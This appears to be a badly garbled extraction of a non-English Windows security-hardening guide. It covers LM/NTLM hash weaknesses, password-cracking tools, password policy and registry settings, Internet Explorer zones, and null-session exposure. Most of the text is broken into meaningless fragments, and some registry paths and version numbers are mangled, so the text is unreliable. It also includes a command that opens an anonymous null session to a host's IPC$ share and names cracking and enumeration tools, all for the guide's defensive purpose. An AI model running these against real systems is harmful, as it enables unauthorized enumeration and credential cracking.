P! &
message digest] -
,
<R
?#
# b
E _ <
$hash ,
-,< 3 < 0_
P! &
d
•
6
E 0
?@ -,6
) - 3•M Y<
- Y ?
N1]
b
)d*
7
)
P
! & ,H ')
)-
/
SB
g
0 < ,6 3
?@
h
83 ( 'hash ,
, Hashe ,
6'
P
! & Hashing
N& ]
3
) -, <
N $-, @
%5G1
P
•
)% !
5
"), )
5 ] LM •
NTLM •
_ 5
LM] Lan Manager] "
LM
-, < Hash
^
XP, 2000 , "), )
LM #
F
0, 5
"
" 7,
5
#< $ F
$, <
P
!
6&
- 3•_
B
. 7
P
LM
,
( #.
6 &' * 7 , H
-,
%#< 2 ,
B
G' 6 # )
P
5 ] NTLMv2 •
)
) X "), ) B
G' 6b. Q #
e 'j 4 7 L _ <
NTLM, ] ' ) #
#< -
5/
"
,
] NT
GX) pqqs "), )
N& T,
"
- Y _NTLMv2
6& $, 5
) 7 ,H
1
),
& LANMAN Hashes]
= GX S 5
P
!
Z#
L "), )
P
!
6&
/,
) W 3 K6A) " - Y
Y6
0,< , 6 3
HttpL://www.msdn.miscrosoft.com/library/default.asp?utl=/library/e
n-us/security/securiy/h-gly.asp
" % c, LM hashes =GX
a
0, <
0, <
% ,P
-
$ 13
0,
d *
&E
7 B
5!
Y6
H F
P
Qf
)
, 5 ! 5E )
2, )
Hashe d *
d *
& _dictionary- style]
P @ hashing LM A ) 2
6 <
0
Lan , K , @ 'SAM
Lmhashes "
)? ,
?@ )
K62<
A) %
HS
%H , / 0, <
P
!&
-
"), )
2
)d *
?
H F
6& •
Ih /
0,
2
F
6
F
- 3• :3 ) , ,
,F
-)8! 0
,6 3
e 'j 4 7 L ) SB
g Manager
#
("c 0
N1" - Y
6-
H$
' R4
-, < S L
I 5 hashes LM = GX
T
, K, @ ' ?
) 6 '_
,
' )n.
R4 S @ LM hashes A) " - Y
5! ?
P
!
K6 <
\X
- < # 2
6
F
K6 < 2
5
)
,K
5
P
!
, ` 4 0,< ,6 3 6 '
P
!&
U)
5 hash
6& •
P
!& d *
, 6 3 -, < 2 5 > ?@
)- 5
b
P
!
-
H, , e G
-, 6 U )
7 B
5!
$, <
#
6& •
0, -, < % , P • & M) /
Y6% < C
'
)-
P
!
-,< , K
/ S 5 ,<
#< C
/8:
6& •
_cracking]
),.
R 3 ) l '7 B
5! % 5#
S
P
!
hashing , @ ' 6
F
6
?# S
j &'Hash T 9
P
Y6j* )
C
'
+
>'" - Y
% ,P• & M) / C 5
0,
&
),.
!89
5
2
<] +5 l
0
,6 3
Y , 4
CG:H )
?# C
85!
P!
6& ? )@
GX)
,
- $() *
0,
H,, 2 e G
"), )
+
0
H F
U)
)- 5 V
&
( #.
- Y
"
6@
6
5
- <
%B
!)%c
"
#
%
/
0 5 - Y
1
) $, -,
?@
# 2
" E
'
B
.
"
)
0 ' ,6 3
#P<
!89
2
C,E
,6 3 S @ e G
$,<
-
5
) , 5 ,H
"
:
2
P! &
0, <
P
!
- 3• B
. )
•
Bc, #
<
F) -, 6 U )
( ,H 62 < " \ 2
! "
6& %
E
I 5 ("c
#B
5! .
- Y
•
0
" - Y = GX
0
2000. NT "), ) #
4 ) - 5 LM hashes T
<%
K6
H F
P, K , "
HS @e G
6" E
"2
0
LM
-,<
P
! & -, 6
- 3• # ) " I '
e 'j 4 7 L Lan Manager hahes
I5 ? "
b
,< ? , " ("c
a
, -,< SL e 'j 4 7 L XP,
K6
P
!
?5F
t6
F) C
8Q
)
("c
5 $
LAN Manager hash
^P
#
ZF
5
John the Ripper ) _LC44 ] 10phtcrack version " ?
"
5
TG' 6Account
6 &'(
?@
6*
! ". /0(123&
,
I 5 6A) 2 P
"
R 3 ?), 0,
:
3? "
6& cracking
P
!
d *
P
! & =GX
+,
,6 3 E
456 123&
\ '2 P
)2
6%5G1
%5
) ( #.
" ? 59
#.
I5 ? @
a
- 2N + ,P QR & Q;3
4
?
L•
P! &
6?
' T /2 !
' ? "W L3 )S
)-
6A) " - Y
P
! & -, 6 d *
A)
#
F
6
SB
g 0
0, 5
], <
2
" \ 2
0, <
_?@ =B*
:
%5
P
!
Y
_password] , 5
P
!
6&
O*
#
M /2 1
) 2' ]
)
,
"
<P?@
,1
P
"
P
!
M) / % , P ( ,H
?@ _
("c
2
? !7 P
!
'L
#) h
c 9 <
)@ ]
-,< F
"
&N F 5B 6
E
H?
_
7
-
-J)
("c 0 <
(E
" ) -,< -
1
) K5 - 3•
I ?
K6
5 $O 3 &
# 2
? "
2 ), " U4 _
, P4
H&
password
d *
6&
- <&
2 ?
)
P 785/ ?, < F
H I
T
\X
W 3
- 3•" M,6] ,<P %#
I 5 ("c %5G1
$-, < = G
( O
%5
P
!&
"
P
("c A" @ ?
3
#
/
) KP
Y1M) / "
!
-
5 MR / 5B
? @d *
6&
"
O* ,
M) /
P
!
%
) 5B
) " )@
M) / ) KP
Y1M) / "
*
6
"
, 6 3 785/
3?
5F
E ) O * W L3
B' (
-,< & %#<
" ,G0
)-
<
6
?@
-J ) M) / ) , !
-,< 3 < (
0 <-
N&
" - Y ) ,G
I5 ) - 5
0,< ,6 3 crack
0, < -,< h PH
),/
P
!&
"
-J )
= G
password ) - P
A)
"
<) "
,< -,< 3 < 5B
3
&
7 B
5! $& @
P 785/ P
6%#< %
-,< Y ? @
0, 5 = G
N F2
P
<" @ 6? "
6&
password (
C
'
P
!& d *
N F- 5 S
("c
0 5 crack
2
-, < 3 <
• ,G
= G - . W L3
Q
#
# 7 5B -, < &
P! &
?
(E
- Y
Hl ' 6
&' * " - Y
T#<
A" @ ) S
9*
&
" ) - 3•
P
!
6&
(8!
6%5G1
T 5! " U 4
" ?
P!
, 5 ,H
6&
Local
.
I5
2
PF 62 ) "
& 2
pqqs $XP $pqqq"), ) 0
6&
I 5 "), )
) 4 " ? 59
6*
)- Y
Q
"
0, <
$
?
b
6
" ?
&
:
- Y -,<
?
7
u
j &'
-,< = G
I5
-,6
a 5 TG' Securty Policy
Local Security Policy Program
Start Pr ograms Ad min istrativeTools Local Security Policy
Select: Account Policies, Then password Policy
a
? 5 TG' Password must meet complexity requirements
$l '
? "
, ` 4 ) ( #.
m .1
-, < = G
I5
P!
F
6 ,
!
6& $ 1/ 2
account ( "
0,<
*
0,<
a,<
" ! 5E
" -)
(&B
0, <
a,
% 5 ?
?@ " ) = G
" U4 )
3 B
P
H
"
P
!
(, ! W L3
? 5
P
!&
K6
% <
P
!&
_Z
A]
B
N
P
Y1• & M) / •
_z
a]
B
N
PY1
q
M) / •
6 H ] 6,6
_ %,µ, s/ ,! C
8Q] KP
Y1 g
,
"
5 $ P
!&
j< %H ,/
"
P! &
u ) E
E
)(5 % <
_{
U4
•
Policy Local Security
" 75 I
4(H
•
•
6
SB
g apassword history (range: 0-24 Enforce)
B
P
H P! & ?56C,E $ 3
5 d*
6& " - Y
?
"E ?
("c ? 59 #P< ? , $S
P
!& " - Y v
$l '
Z>
"
" - Y
0, 5 - Y
$, ,F -,< = G
P
! & 2,
2 , 0, <
, ,F
GX)
\X
,N
2 ) - )@
I
0,<
,
?
b
< TP,
, # 4 " U4 B '8
P
!
#P
<
6&
P! &
$ Y
5 $ P
!&
`*
d*
,
$") S /
0_, 5
$") S /
, 2'
P
!&
P
!&
I
_
u
_ P! ] 5! Q , /
P
!&
3
P
!&
u
H
B 'c
,< ,6 3
minimum password age , # 4 0,< maximum "
N
m.1& password history
u
5 ,H
) M , 6 -,
P
!&
P!
#
P
!&
0
? ,
(&B
LOG on 7 B
5! $?
:
F) ?), 0, < -, <
P
!
5
" - ), .
" U4 ) = G
_, 5
#
&1$,<
minimum
" 0, 5 #P<
F) ?
, ,F
F) ?
, ,F P
!
e 'j 4
$Characters Minimum password length 0-14
T 9 %H ,/ ] , 5
-
, b
, password history
0
_ P! &
3
S
d*
Y
password history % 1 2 , 0 < ,6 *
, G %H , / $l '
,P "
6
O * password History % 1 2, 0 < ,6 *
,
6& -,
("c ) - P ? "
P! & _ u] = G
O*
<( E
6 '? @
? " 7, ?,<
5
,
6& " , E - Y ? # ) -, <
2 ƒ e 'j 4
)(E
Y " j
password age minimum
,
-, < = G
,<
H?
l '? " 7, ] L *
I
_ P! ]
)F
$ Y
I
P
!&
0 Days Minimum password age (range:0-999) ‚, < , 6 3
d*
2'
Minimum password age 0, 6
)
[
(&B
-" F ?
&
)" " ,
u
# " % PH ] , 5
)
YB*
F) minimum password age
<
# " %P
H ] 0, 5
-
P
- Y
Maximum password age (range:0-999 days)
5! Q , / $l '
$l '
5K ) 5
GX)
u ?#
0,<
5!
P
!&
2
d*
P
!&
P! &
= G
T 9 %H , / :
("c
2
?
T 9 %H , / 0
#
MR /
P
!&
0, < ? "
0 '
I
F) 7 ) X $ Y
6
"
6 , ?
0, -
4 :
2
,
- ")
, W L3
)S
0 '
$ P! &
F) 'Y< ) d *
:
, $ #P< 7 !89
6? "
2
"
3
In the domain Store password using reversible encryption for all
N& " - Y
P! &
"
K6
?
, K , @ '( E
N&
W L3
"
("c
6&
P
!& ]
6
7
$-, < DY/
0
P! &
6 @
I
- 3•0
15G
P!
l'
P
!&
"
- 3•$ ) )
K6%# ) 4
-, < K & $, 5
6&
$, 5
- Y
- Y
?, < T G'2
" - Y
0 users
$l '
2
"
4 ? 5 m .1
d*
5/ 7 # $ :
I
P
!
2 7
, 5
) )
0_
I
- 3•
( &1 I
,G
0
6&
"
6
P )
" %51
E
I
?@ " ?
K6A) "
6account "
F$ 5 - Y ?
R4
#
6 -, `4
a
P
!
b3 n 9
from Command line Promp:
Net User Username/random
6)
56] -, ` 4 ) ' L
I
P
!
P
!&
6&
- Y
6
P
GH ) ?
& cracking
("c _
P
!
P
!
) -, < I5 S
^P
6
6&
F$ P
!
, @ '"
, < ? , " ("c " E S
("c " E S
6& $l '%5G1
P account
_T 9
# $l 'A) 0 <
5 )6&
*]
-
j 5 .Y
Service accounts
Y
&5
- <\ X
6
^P
A) 2
Stand alone
?),
" U 4 0 < - Y cracking
•
F
"
GX)
2
0
P
!
C, E
5 $? "
)
l '7 B
5!
crack ? @
$
?@
P!
) -,
$
6&
0
? @ \8 9
H?@
3
I
N
? "
(, ! 0, <
/ G ;3 A
$?
b
6&
3 ?#
-, < - 3•?@
SB
g 0 <-
v 4
6%5G1
) C 3 0 <I $?
DY/
:
? @ DY/ (,! 7
?
K6% '
I
'
DY/ ) ,<
A" @ ?
3
= GX
$ K6( 4 2 `
<
$
) [
>/
?@ "
,
<
)W 3
("c ) P
!
)
6&
-, < % L
, Y 5! ( 5 -,
("c 2
K ("c
6account
F
$, 5
6A" @ ?
<•
(E
MR/
2
1E
0
6 N4
0
^P
5
6
$
5 - Y
6account &5
)
:
,
P account
)
0
2
F
? , GA
,account
#P< )
0, <
4
'
0
K
B
5F " $,
P
!&
" %P
H)S
E
$6 )
H
6
F) ? N
,<
P
!&
3
("c
P
!"
“ and must be changed Your password has expired
O*
$, <
H,, e G
A" @
P! & 2 < (,! $ N
6&
,K
A
456 •
2A
N +A
,P
0 ' ,6 3
B
.
P
!
crack
("c
"]
$ P
P!
?@ ?,
6&
& $_ E
6
% <
P!
I
l '7 B
5!
$
O * - . W L3
6&
F
)
\ X
P
!&
P!
F
( E -,< DY/ 2<
( E -,< DY/ 2 <
-,< +H ) F
$
6
0
K6A) " - Y $= GX
, 5 ,H ) #.
%5G1
6&
. 7
$S
0
?
P!
craking
P
!&
B
1
I K6
&
N
:
^P
6account ? )&' I
1 -,< , K
) "
- 4 $,<
W 3 K62 )
5 ?@" - Y
0
?@ ?
(N "
K6account MR/ )
) X
3
"%
, ?@
, P4
'
account MR/ I
%L
0
S
, N)
)% !
b
- Y & $
F
P 4
-,< K
-, < K
3
- Y $, - 5 V
I
:
G 2N P
7 # " - Y
2
P$
%
/ ? 59
62 ) "
? "
# 54
:&N 0
1
6 „ 1 # 2 3@
56
1 P!
0
)?
3 -
+ $S&•
-)8! ?
$ P! &
6 & " $ #P
< 6U )
P
!&
, N $S
2, 0
0
lan
&N F
6,
& 2
LM A9(? 2A& * B •
G ;NA
8
_Version2] Ntlmv2 NT LAN Manager A) " - Y Manager
0
$, K
I
,6 3
6(& #
P )
I
#.
N& " - Y
E , B $ " T),F
a,6
?
$, 5
T
- 5 M 9
$NTMV2 v 4 |j1
LM
pqqq ) NT "), )
6=G
l ' BH
Rgistry key
Hive: HKEY_LOCAL_MACHINE
Key: System\CurrentControl Set\Control\LSA
Value: LMCompatibilityLevel
ValidRange: 0-5
Default :0
f4
Y 2
, ,
)d*
, K A) ) \ $l '
Q
4 •
a,<
7 # " & 6$NTLM ) LM A) h
v 4T
0 < 5 - Y NTMv2
NTLMV2
7 # " - Y
NTLM , K A) h
T
…p
NTMV2 , K A) h
T
…s
LM , K
;! DC
…x
) -,< NTLM ) LM , K
;! DC
…r
0
' R4 NTLMv2 , K C
'
…w
0
- Y
?
0 5 lan Manager , K i:
6
pqqq "), )
LAN
^P
0,
#4
75 I
, #4
("c :
$ Manager authentication level security: Network
I
) SP4NT "), ) $ 6
-, < S L ?@ " , G
)
? ,
U)
LM hashes T
"
5
("c 2
5 ,H ? ,
U)
NT Lan
?
E
4 ,
2
6& " - Y 7
?
I K6
$ NTLMv2
,
5 #
‡ NTLM " - Y
:
#
$, <
f4 , Controllers Domain
I
$l 'U )
0_ #P
< )
(&B
P LM
I
BH " - Y
) Y
_ {† "), )
hashing
0 5 T5! Domain Controller
0 '
6
SL " U4 0
0, <
$ 5 NTLMv2 " - Y
u?
)
6 ,
5 - Y Network Client Microsoft - 56
$, 5
?
O* S
l '
N 4] '
LMCompatibility (
,
)
Directory Services Client
?@ )
(5
NTMv2 " {† ) {r "), )
e 'j 4 7
I
2
) $ Manager authentication Level LAN
0,
)
( ,H ? @ "
Security Options ) Policies Local
O* S
pqqs ) XP "), )
) ,
I
) T G'Policy Local Security
&
•
# & XP ) pqqs $pqqq "), )
-,< K
SL
,
,
) {r "), )]
:
I
Manager,version
LMCompatibility Level
authentication level Manager
("c 0 '
U)
Send NTLMv2 Respone only\Refuse LM
I
)
), . T 5! $ :
MR / ^ P
B %K
& 2
? @ "
-
LM hashes E ? 5 TG' g
1
)-
-, < SL ? @ )
(E
2
l '7 B
5! T
$ "
) ,< ,6 *
Value on next
0
? ,
*&
•
LM hashes
& #
') #
C
'
F)
?@ " - Y
XP ) pqqs $ _
-, < E l ', B Windows 2000 Domain Controller )
5 - 3•&
LAN
- < # 2
6
E , B0
I
3•$ #P<
I
) SP2] 2000 "), )
,G
25
# GLmhash + A 1 A7T
"
) SAM
0
?#
Local Security Poclicy
,
#
0,6
$Lanman hashes $,<
E
$Xp ) pqqs "), )
& ? 5 T G' ?
0
password change Lan manager hash network security: Do not store
("c :
2
) Local Policies
6
$l '7
- <
hash LM "
0 '
# 2
#
"
I
M ,6
) T G'Policy Local Security
&
u T5! " U4 0,
O* S
Security Options
("c 0, < +H ) [
$-, < E 7
u -,< " , -
, ,F hashes LM E W L3
P
!&
- 3• :
)
("c
Y7
N 4C
'
$-,< K
6A)
F LM hashes ) 0,< , 6 3 MR/ $,6
Rgistry key
Hive: Hkey_local_Machine
Key:
System\Current ControlSet\Control\LSA\NolMHash
(E
u
3
6 & GSAM :(A
AVL + A
A
,WA
A
&
6A) " hashes
"
P
!
A
A
*& •
Hash A
AU;( + SA
A
0
6& ? )@
,
$ P
! & cracking
I
a, 5
4
"
I 2 , a #P< "
P
!
- Y
6& =
a
2
] #P<
F M, 6
- Y ethereal
0_
0-,< ˆK
6 #P< " - Y
#P
< 67
MR/ ) d *
I
, 1' pqqq ) NT4 "), )
b
< ,6 3
% '" - Y
_ C:\Winnt\System32\ Config
F) ?@
Q# ?#
"C
'
SAM % '0,< -,< " , -
?
0 )@
-
56) ), . Controllers Domain C L3
@ 78#
3
I
& Repair
F
) Lock "), )
N % !
, & 9
i: j &') SAM % ' Q
# "
("c
:
l '% '0SAM % ' Q
#
$l '% '0,<
2<
6& " ?
5!] SystemRoot%\System32\Config
C
% !
3
N 4
6
Backup
I
# &'
) -,< ' Backup 7 !89 "
0
a 5 - Y
" 7c
" ?
B5# 7 !89 R3
-
How to Disable LM Authentication on Windows NT
-
How to Enable NTLMv2 Authentication for Windows
95/98/2000/NT
-
New Registry Key to Remove LM Hashes from Active
Directory and Security Account Manager
E
! " % &#
$X
Internet Explorer (IE)
0
' ) #
?@
"), ) ( '784
N ( N ) Patch
5 $,
R4S
@^
h
IE
?
6T
R4 S @ ^
0
T#< ")
85/ ,
6
)
B
.
%
$ 6
K6 *
,6 3
"
5
IE
) ,G
F) "), )
)
K6
6
)
SB
g
" - Y 7 ) X, <
0
)
SL &
+
2 , ,F ) 2 3@ " 6)
0 < ,6 3
-,6
) IE W
F) IE
<
L3
("c
Windows U )
5
6
$, < -,
4
R4 S @ ^
- Y "), )
') #
6 &'(
/ $IE
)
,
F) ?,
0 <
?@
! ". /0(123&
)
#
6Patch
SL
#
http://windowsupdate.microsoft.com/
?
0
( E
"
) HFNetChk
" ?
,
F) '
Update Windows U )
)
#
Analyzer Microsoft
F Online
)
HS @), , e G
, < T G'
0 5
F) $, 5
C 5! ) SL
,6U )
$U#
+,
-, < - <
0 < ,6 3
)
#
) - *1 6,
)
6)
Z '?@ ,
$() *
7) Y
)
)Y
?5F
T
@^
6
Y $T G' 6
6% '
R4 S @
IE
$O) 7 Y. a I
.
#
R4S
b
l ' R4 S @ ^
Z F $0
6*
, 63
-, < ( E ? 5F
) MIME \ )
,6(E
0
$IE
)
IE -, < SL
, G 78 5/ ?
$"), ) U '
' &
$ B
.
-,< SL e 'j 4 O)
) -, < S L
" ?
2
$, < -,
6Patch
TG'update
0 5 - Y Baseline Security
Check Qualys Browser a I _O)
0 5 - Y $IE
GX)
P
)
F
&1 @
,<
6 &]
B
: )c
! " %&
IE
)
Y
- Y
)
2
-,< - <
R 4 S @ & IE 1
)
)-
5
I
#
B
! 0, Z
0, <
0
0, K5 ( N ) Z
- Y % H)
W L*
S @^
‰8
;!
("c
6patch
?@ $
6Service Pack
+ F Patch 2 3@
0 5 SL
)
("c :
&
N
'X
IE +
i.
%/
,
?
#4) I
$l '
3
7 # "
%
0, *
P
R4
#
IE
! 5E
IE
GX) ?
?@
a 5 TP
Inetnet
6%
bP
& O*
•
Custom Level ? 5 T G') Security Tab
& O*
•
4" - Y Z
T G'$
"
n 9 " Options
Tools
("c 2
0,
a <( E
%1
, $IE
"
F) (,! $
$-,< K Service Pack 2 3@
_†pp{pr]
6Patch
("c
0 5 - Y Explore 6 SP1 Internet a h @ " ?
2
F j< *
- Y 5/5IE *
4$
0
6Patch
("c
F SB
g W L3 2
$j< l ' *
- Y IE6.0 * " #
'
5
456 123&
R4 S @ ^
6*
K
P 785/ Q Zone.
R4 S @ ^
n. $ActiveX Controls ) Scripting Active
6@)7 I
l ' 6%
4"
-
) ?,<
Prompt for Allow paste operations via
& $Scripting j *
•
Clipboard n 9 "
("c
script
TG' g
I
. W L3
5 Active Scripting
0_, 5
- Y $l ' %
N4
- < # 2
4" 6
Download signed Active X Controls
O) "
Prompt
O*
("c] 0 < ( E
" ,G
& O*
$
•
Download unsigned Active X Controls
Initialize and script ActiveX Controls not
Disable
& O*
•
Disable
& O*
•
marked as safe
& $Microsoft j*
•
& $Microsoft VM j*
•
High safety for Java permissions
High safety for Java permissions
N 4) )F
6 B
4 i.
F
I
("c
0
across domains Access to data
0
TG' g Cross-site scripting
6" E
O* $
& $ Miscellaneous j *
P 785/ "
G5
^P
•
I 5 $sources
! " % &# R
Windows Remote Access Servies
#P< ^ P
)Y
-, < K
„ 1#
6%
^
6 „ 1 # ) 7 # $"), ) 7) Y
4)7 # "
-,< K
3
6 K
)
:
2
0, 5
,
6V < ? `56
$_PRC] 62 )
E
3 ')
#P
< 6 BH ) 7 #
0 3
"
) 6 '2 <
+
2
F +
GX)
, 5 ,H )
F ? &
&
3)-
3
,
"
) " g@
(, ! ) l '=GX ^
$? &
6 '? &
# l '%
< TP,
" 7,
F
-
)
3"
+
V <S
,
7 L
?5F
b
?@ "
?#
K
%
b
<R V <
) CIFS File
) - "
4_
(E
,
b
?&
)
K6 *
_
-
<
) F
"), )
)
,5
I ] 6h) ) ) 6
/ 6
!
DY/
- Y "
W L3
) P
Q M ,6 l '?
6% '
T
$ #P< V < S
? ,
_
)
#P
<
,
# 4 (, ! % 1
,
B
.
# 4 (,! % 1
, 1
)-
3 7 / pqqw T
"
2,
? &
" - Y
$ #P< V < i.
0, <
S
7 B
5! ( E ?# $l ' 6%# ) 4 0,<
CH ] 0, 5
F 7 # "
% '" - Y Z
-
$,
l '+
System Common Internet )
"
456 Q -NETBIOS
H #P<
#P< ? &
7 B
5!
"
- 5 6 '$?@
P l '(& # (SMB Block Message Server)]
%# ) 4
(
,G 7 5F
0
!
" - Y
)
6 '&
^P
K6 , 1' ) % 'V < ?# $"), ) % !
-, < <R V <
0
Logon NULL
6i
:< 8 Y
^P
6
) -
) "), )
4 6 3 $l '
5/ ) K
#P< 6%# ) 4 Q
Anonymous $7 B
F $NETBIOS #P<
) - "
6*
0, 5
0, 5
("c %
4 $ #P
<
E
6@
) 6 , 1' 3
) 6
I]
6 ' #P< ?
)
F +
2 < ) ?, 3 ?#
$ < ( E #P<
-, < <R V <
+
0 ' ,6 3 j6
. " : 7, ,
"
"
3
$ 3 ? #56
<R V <
P
,
)- Y Z
_ 6% '
#4 #
0
:3 )
Logon Anonymouse
Null Session
85! $Session
C
P
!& )( ]
l89 $_ 13Null Session
" 0
6U )
0
- Y
6
)
"), )NT ? G $Local System account
E n 9 " #P<
? G
$bP
7
L
6
A R4
3
:
l'
0, 5
Null Session
H$
$ P
H
^P
Local
,K
1/
6*
I5
Z F
0
*
?# $
"
%1
,
1
), 5
5 6 '
u ? # $pqqq "), ) " % P
H 6*
KN* 4
Session Null pqqq "), )
2 ) 6'
,
_
&
+
R
1
:
${†"), )CE $NT $pqqq $ME ) XP B B &
) 6N
,
,
# 4 $ &'(
- P< 7 5 I
H
0
)
- Y $? , 6 native
A R 4Null Session )
6
$?
)Z F B
.
0, 5
%#
$ 6-)
Z F computer account Local U )
H ) 6 'pqqq "), ) " % P
H
]
<+
I5
) pqqqLocal System account )
#
3
7 !89 j 5
null Session "), ) 0, 5
6U )
6U )
Computer " $,
bP
P! ?), -,< E
1
6,
F)
I5
)
? @ ) 6 '? 5F
,6 3O *
Z
,
<
-,
6" E 0, 5
b
E
!89
E
- Y
"
$ P
75 I
) - "
23 , - 9*5 ) l ' GX) " - Y Z
:&27 RPC Remote Procedure Calls:[
"
] "), )
6*
" , GNT $pqqq $XP (& #
"
9P I nter process
Z F T/
) - " ) N ?&
0
' 7
F ,
3 '
)
3 - *1 ,
0_ B
.
F
\ " 785/ ( E
3
H F
- Y
)
,G 785/ ?
0,<
H F
2
Blaster/Msblast/Lovsan )
6" E - 5 ] 0
Nachi/ Welchia " - Y
0, 5
H $? &
$l ' R 4 S @ : " - Y
) - " ?&
6(
2
" _pqqs $
0, -
- Y l ' R4 S @ : "
Dos
R4 S @ ^
!
^P
$
RPC0
! ") *
0,
+,
H,, 2 e G
+
%K
bP
:
R4 S @ d *
7c #< d *
I5
% 'V < U )
?#
F
?
$l '
5
&
- .NETBIOS
T L.
&'Afentis security 0,<
A8 " %P
H 7 !89
#B
5! - . "
)@ +5F I 5
6@
2
a
0, 5
$
-,< h PH
NAT ("c
NETBIOS $, L
W L3
:
,G " ? NETBIOS - Y
"
Netbios Auditing Tool (
-,< K ) W L*
^
6*
! ". /0(123&
0 5 NAT 7 5B "
b
"), )
6
B
/
$
)
#)
" ) (E
- Y $% '
h @ " http:// www. Afentis. Com/resources/win32/nat - Y
0 5
" ,
v2.11 Legion N
${† ) {Š "), ) ?
% 'V <Legion b
" ,
-,< K Rhino9 #P< V <
$pqqq "),
)?
Checker)Security Fridays Share ? ,
) {† ${Š
6*
] "), )CE S @ d *
0,
U)
4 *
GX)
5 - Y
I5 _
SPC)Password
% 'V <
? # $l '
2 3@ ]
I5
0, 5 - Y _
R4Level password share "), ) ?
^P
NT ? @ )
] sp4 $pqqq $_,< -,< SL XP
Baseline Security Advisor S @ ? & W L3
:
R4SMB 0, 5 l '%#
)
0, 5
B
. ? &
"), ) ?
)
? 5 M 9
?
$pqqs )
("c A & R3
)- Y
( ,H $
R4 S @
" - Y Share net , 5 -,6
€" ?
" ,
6
)
( E ) - " ? & NT $pqqq $XP
0
$l '
<+
^P
6'
B5# 7 !89 "
,
pqqs )
1$
b3 n 9 " )
6@
]Net Share/ $
0_ 5 - Y
0
-, < K
' j
$
<+
<+
T 5! )
^P
6( E ],<
7 !89 S
a
‰8
- Y
" 7c
)
7
<
"), )
<+
W 3
<+ …
)% ' ^ P
$
:
u
!89 1 2
6( E " %P
H$
F) 1
)
I 5 0_ < ( E
" ?
u
1/ +
6@C
8
<+
7
?,
("c 2
W L3
L
7
u
u $-,6
$ I - .…
:
" ) - 3•…
3
6" E MR /
P
!&
DY/ ) -,< -
)
6 ,1'XP
"), )
< ,1'
V < ? 5 TG' g - .…
"), )XP
V <
"), )
a
6" E
6*
, N ) 6% '
"
6
- .…NTFS
<+
^P
e 'j 4
6" E
"), )…NT "), ) ) pqqq "), ) $XP S L " % P
H ] SP1 " E
$_
"7 L
Everyone 7 L ) Control Full0, <
"), )…XP ? @ )
SP1 " E
-, < SL Everyone )
$
7 L Read0,<
"), )…xp (
e 'j 4 7 L Sharedocs
<
User s/ Documents and settings/All C: /Documents " E
]
_
Everyone 7 L ) Full Control0,<
d *
H
+
Open Share
"
GX)
I5 +
" ?
"), )
GX)
# 0_, <
I5 $ F
5 ?N
) 25 $?N SMB
6*
5
6
<+
^P
R4 S @ ^
- Y % H
?@
:
d *
3
], <
File Sharing %K
^
Gibson Research Corporation " ?
&
"
6 N 4 SB
g
bP
2
I5
)
R4 S @
0 5
'
j 4
6&
a 5 - Y
…Nessus0 ) - " - Y
I5 -
) -,< ( N $?N j 4 &
a
…Winfingerprint N 4 aWin32 Host/Network Enumeration
A
A
:
+ A! A". /A
0(12A
3&Logon Anonymouse 9A
I 5 G?" \N( Anonymouse Logon
R4 S @
null Session0 K5
TG'$
b3 n 9 " ) "
$
" - Y
From Command Line Prompt:
C:/>net use// ipaddress/ipc$""/user:""
< +P
TL
? G ) -,<anonymouse
P
! & Null
$l '
-, < 'N I
System error 5
F " U4 #
'
F
Ipaddress d *
?@ ( ] user/:”
)_
hidden interprocess communications
E ]
H $l ' R 4 S @ : e G
& @
IPC$
E ;! $l '
P
4 $l '
)-
F) (, ! -, 6,
2 (E
F " U4 #
$
0_
n.
I 5 ("c " E
0 < ,6 *
=GX 2 %
R 4 S @ -, 6,
]% P
Hj *
-, <
'G
Winfingerpirnt d *
$+ A R
6 &'(
1
j 5 .Y
" 0
)
Nessus )
, 63
& _Null Session0 5 - Y $
I5 ?
A
$ <-
: A
A
A
+ A! A ". /A
0(12A
3&
NT
NTRK)(Resource
( regdump.
K F % ' % <$ ' ) #
n 9"
"), ) ? & NT
h @" ?
E
b3
+
&
:
XP
%
-)8! 0, 5
http://www. Afentis. Com/top20
0 5 - Y & _
]
F
#P< )
6&
K<@
I5 $
6
! ". /0(123&RPC
]
' ) #
Secutity Analyzer
I 5 A) 2
h @ n 9" ?
l'
9
Microsoft Baseline
$l '
0
-M2A
" - Y 0
-
K $
R4 S @ d *
http://www.
Microsoft.
Com/technet/security/tools/Tools/MBSAhom. Asp0 5
! "
'
456 123&
DY/ - .NETBIOSa
bP 785/ %
- Y ^
-
) pqqq $NT )
$ B
3
Patch-cheking , hotfix (
2
% H$
6" E TG' g 7 L
I "), ) ? &
$l ' &
n 9" h
7 , , j6
I5
,G
6 #6 " ?
:
2
a 5
5 ?@ " - Y
) X #
sharing ? 5 T G' g
0,<
CE ) {† ${Š "), ) ? ,
* ? G
User-Level share access control 7
U)
4
L $, <
NT "), ) Dmain "
0,
6% 'V < 0
0
) FTP n 9 "
? # $sharing " - Y
C
'
,6 3
sharing $S
?@
N
n 9 " b' -,< <R V <
&1 P
!& z
0, K5
, 1'
6 , 1'?
? &
7 ) X7
2 , 0, 6 ( E " E ) -,< , K ?
0
#4
sharing ? 5 T G' g
)
HTTP
R4 7
+
$S
? &
,
$
< +P " - Y
I5
Sharing
), . C
'
$7 ) X 7
)(E
,1'
:
0 <R V <
h @
sharing ?# ?
),.
0_,<
("c R 1$
?@ " $
E
<
$
DNS
F) ,
-, < K
u
S X j &' I 5
E
u
a 5 - Y
"
:
:
2
6
!89 $ 1 2
6T 5! " % PHBackup 7
" ?# $7 ) X Restore " ?
] ,E
?# ] 0 5 ip
#
-, < '
0,<
<
F) ? @ _
!89 +
"), )
NT "), )
F ? 5 Restore ) $j
F i
) $ Backup - .
4.0
F ? 5 Restore ) j
) $ Backup - .
F ? 5 Restore ) j
) $ Backup - .
pqqq "), )
) XP "), )
pqqs "), )
"), ) 7
L
, " Null sessions
" #
&
K6
2
NT Domain Controllers $, -, < ,
0
Windows NT Domain
pqqq "), ) " % P
H
6*
,63
3"
7 9P
#4
I5
pqqs|pqqq "), )
?# ]
-,< Z F P
)
1/
b
2#5
I
!89 ?& ?
,<
<
F)
I 2
F Restrict Anonymouse 9
$ pqqq "), )
6
$
•
"
- Y $_ , 5
5
1
) j6
6%
4) 6
#
h
), . T 5!
a 5 - Y
" 7c
"
5 $
,
I5 0
MR /
,6 3 )
7 !89 R3 null session " ?
:
$
! 5E
Anonymouse ?
"), )
- Y ?5F
T@ -, % / - 0,
- Y pqqsRestrict Anonymouse
, $
6 '
7 !89 K
),. T5!
NT
Restrict Anonymouse
"), )
F
,
" - Y
- .
pqqq
F
a 5 - Y
"
, Restrict Anonymouse 2 #< ;!
F
Domain 0
6, B
"), ) ?
%
